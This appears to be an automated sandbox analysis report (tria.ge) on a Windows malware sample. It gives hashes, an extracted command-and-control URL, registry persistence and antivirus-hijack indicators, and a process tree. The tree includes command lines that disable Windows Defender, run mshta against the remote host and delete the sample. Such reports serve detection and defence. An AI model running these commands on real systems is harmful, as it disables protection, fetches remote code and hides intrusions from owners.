Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
27/03/2024, 03:19
Static task
static1
Behavioral task
behavioral1
Sample
e0a30f2c32754a4a4a79b13ff0b5e03c.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
e0a30f2c32754a4a4a79b13ff0b5e03c.exe
Resource
win10v2004-20240226-en
General
-
Target
e0a30f2c32754a4a4a79b13ff0b5e03c.exe
-
Size
1.7MB
-
MD5
e0a30f2c32754a4a4a79b13ff0b5e03c
-
SHA1
1360a9cd73566cbff17f4227e3edc1294b82b45d
-
SHA256
274857d62ace68dfc99693252fc4e5cca95f8308d04fc09e84e6d36ae5be03fa
-
SHA512
02237d6736f915e89aa60b86a6a09aa02ea9dc2cb3e4ba8c24932212ff66464f2981a1275513809d4e8ea9605c012abf7fa1a170d9e49e4dbdafc322fc0dc05c
-
SSDEEP
49152:PK/rgBg1pOCjLIx4uRZjxPgw5a1pxyupW:uEKNjTuRdJgua1pxw
Malware Config
Extracted
http://pcguarrantorutility.com/favicon.ico?0=72&1=0&2=1&3=62&4=i-s&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\wwvxrv.exe" wwvxrv.exe -
Sets file execution options in registry 2 TTPs 16 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe wwvxrv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe wwvxrv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe wwvxrv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" wwvxrv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" wwvxrv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" wwvxrv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" wwvxrv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" wwvxrv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" wwvxrv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe wwvxrv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe wwvxrv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe wwvxrv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" wwvxrv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe wwvxrv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe wwvxrv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" wwvxrv.exe -
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
pid Process 2400 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2456 wwvxrv.exe -
Loads dropped DLL 2 IoCs
pid Process 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2448 sc.exe 1244 sc.exe 1180 sc.exe 1848 sc.exe 2504 sc.exe 2584 sc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2456 wwvxrv.exe Token: SeShutdownPrivilege 2456 wwvxrv.exe Token: SeDebugPrivilege 2456 wwvxrv.exe Token: SeShutdownPrivilege 2456 wwvxrv.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe 2456 wwvxrv.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 1308 wrote to memory of 2504 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 28 PID 1308 wrote to memory of 2504 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 28 PID 1308 wrote to memory of 2504 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 28 PID 1308 wrote to memory of 2504 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 28 PID 1308 wrote to memory of 2584 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 29 PID 1308 wrote to memory of 2584 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 29 PID 1308 wrote to memory of 2584 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 29 PID 1308 wrote to memory of 2584 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 29 PID 1308 wrote to memory of 2528 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 31 PID 1308 wrote to memory of 2528 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 31 PID 1308 wrote to memory of 2528 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 31 PID 1308 wrote to memory of 2528 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 31 PID 1308 wrote to memory of 2448 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 33 PID 1308 wrote to memory of 2448 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 33 PID 1308 wrote to memory of 2448 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 33 PID 1308 wrote to memory of 2448 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 33 PID 1308 wrote to memory of 2456 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 36 PID 1308 wrote to memory of 2456 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 36 PID 1308 wrote to memory of 2456 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 36 PID 1308 wrote to memory of 2456 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 36 PID 1308 wrote to memory of 2400 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 37 PID 1308 wrote to memory of 2400 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 37 PID 1308 wrote to memory of 2400 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 37 PID 1308 wrote to memory of 2400 1308 e0a30f2c32754a4a4a79b13ff0b5e03c.exe 37 PID 2528 wrote to memory of 2588 2528 net.exe 39 PID 2528 wrote to memory of 2588 2528 net.exe 39 PID 2528 wrote to memory of 2588 2528 net.exe 39 PID 2528 wrote to memory of 2588 2528 net.exe 39 PID 2456 wrote to memory of 1244 2456 wwvxrv.exe 40 PID 2456 wrote to memory of 1244 2456 wwvxrv.exe 40 PID 2456 wrote to memory of 1244 2456 wwvxrv.exe 40 PID 2456 wrote to memory of 1244 2456 wwvxrv.exe 40 PID 2456 wrote to memory of 1180 2456 wwvxrv.exe 41 PID 2456 wrote to memory of 1180 2456 wwvxrv.exe 41 PID 2456 wrote to memory of 1180 2456 wwvxrv.exe 41 PID 2456 wrote to memory of 1180 2456 wwvxrv.exe 41 PID 2456 wrote to memory of 1536 2456 wwvxrv.exe 42 PID 2456 wrote to memory of 1536 2456 wwvxrv.exe 42 PID 2456 wrote to memory of 1536 2456 wwvxrv.exe 42 PID 2456 wrote to memory of 1536 2456 wwvxrv.exe 42 PID 2456 wrote to memory of 1848 2456 wwvxrv.exe 45 PID 2456 wrote to memory of 1848 2456 wwvxrv.exe 45 PID 2456 wrote to memory of 1848 2456 wwvxrv.exe 45 PID 2456 wrote to memory of 1848 2456 wwvxrv.exe 45 PID 1536 wrote to memory of 528 1536 net.exe 46 PID 1536 wrote to memory of 528 1536 net.exe 46 PID 1536 wrote to memory of 528 1536 net.exe 46 PID 1536 wrote to memory of 528 1536 net.exe 46 PID 2456 wrote to memory of 1588 2456 wwvxrv.exe 49 PID 2456 wrote to memory of 1588 2456 wwvxrv.exe 49 PID 2456 wrote to memory of 1588 2456 wwvxrv.exe 49 PID 2456 wrote to memory of 1588 2456 wwvxrv.exe 49
Processes
-
C:\Users\Admin\AppData\Local\Temp\e0a30f2c32754a4a4a79b13ff0b5e03c.exe"C:\Users\Admin\AppData\Local\Temp\e0a30f2c32754a4a4a79b13ff0b5e03c.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
PID:2504
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
PID:2584
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵PID:2588
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
PID:2448
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\wwvxrv.exeC:\Users\Admin\AppData\Roaming\Microsoft\wwvxrv.exe2⤵
- Modifies WinLogon for persistence
- Sets file execution options in registry
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
PID:1244
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:1180
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵PID:528
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
PID:1848
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://pcguarrantorutility.com/favicon.ico?0=72&1=0&2=1&3=62&4=i-s&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000"3⤵
- Modifies Internet Explorer settings
PID:1588
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\E0A30F~1.EXE" >> NUL2⤵
- Deletes itself
PID:2400
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD5e0a30f2c32754a4a4a79b13ff0b5e03c
SHA11360a9cd73566cbff17f4227e3edc1294b82b45d
SHA256274857d62ace68dfc99693252fc4e5cca95f8308d04fc09e84e6d36ae5be03fa
SHA51202237d6736f915e89aa60b86a6a09aa02ea9dc2cb3e4ba8c24932212ff66464f2981a1275513809d4e8ea9605c012abf7fa1a170d9e49e4dbdafc322fc0dc05c